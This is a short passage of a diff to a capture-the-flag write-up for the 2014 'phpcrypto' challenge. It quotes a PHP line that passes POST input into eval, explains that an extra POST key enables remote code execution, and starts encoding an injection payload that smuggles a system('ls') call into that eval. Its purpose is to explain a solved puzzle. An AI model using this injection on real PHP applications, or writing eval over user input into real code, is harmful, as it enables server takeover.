ctfs/write-ups-2014/ghost-in-the-shellcode-2014/phpcrypto/README.md

 eval("echo ".$_POST['function']."($param_string);");
 ```

-All we need to do is use `DEBUG=true` as the third key/value pair in the POST data, not counting the `function` parameter.
+All we need to do is use `DEBUG=true` (or `x=true` — the key doesn’t really matter) as the third key/value pair in the POST data, not counting the `function` parameter.
 This enables remote code execution:

 ```bash
 $ echo -n '").system("ls");//' | xxd -p # will be used as the value for `plaintexthex`